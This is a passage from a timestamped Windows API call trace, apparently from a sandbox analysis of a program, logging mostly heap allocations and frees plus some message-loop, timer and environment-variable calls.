HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0240.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0240.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0240.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0240.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0240.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0240.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0240.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0240.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0240.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0240.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0240.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0240.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0240.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0240.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0240.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0240.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0240.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0240.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0240.343] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0240.344] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0240.344] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0240.344] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0240.344] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0240.344] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0240.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0240.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0240.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0240.345] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0240.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0240.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0240.345] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0240.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0240.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0240.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0240.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.345] FreeLibrary (hLibModule=0x756e0000) returned 1 [0240.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0240.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.345] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0240.346] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0240.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0240.346] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0240.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0240.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0240.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0240.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0240.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0240.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0240.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0240.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0240.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0240.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0240.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0240.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0240.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0240.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.347] CloseHandle (hObject=0x2a0) returned 1 [0240.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0240.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0240.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0240.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0240.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0240.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0240.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0240.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0240.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0240.354] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0240.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0240.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0240.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0240.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0240.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0240.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0240.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.355] CloseHandle (hObject=0x2d0) returned 1 [0240.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0240.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0240.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0240.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0240.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0240.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0240.361] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0240.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0240.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0240.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0240.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0240.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0240.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0240.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0240.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0240.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0240.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0240.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0240.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0240.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0240.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0240.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0240.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0240.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0240.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0240.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0240.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0240.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0240.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0240.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0240.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0240.369] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0240.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0240.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0240.369] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0240.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0240.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0240.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0240.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0240.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0240.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0240.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0240.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0240.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0240.370] RtlAllocateHeap 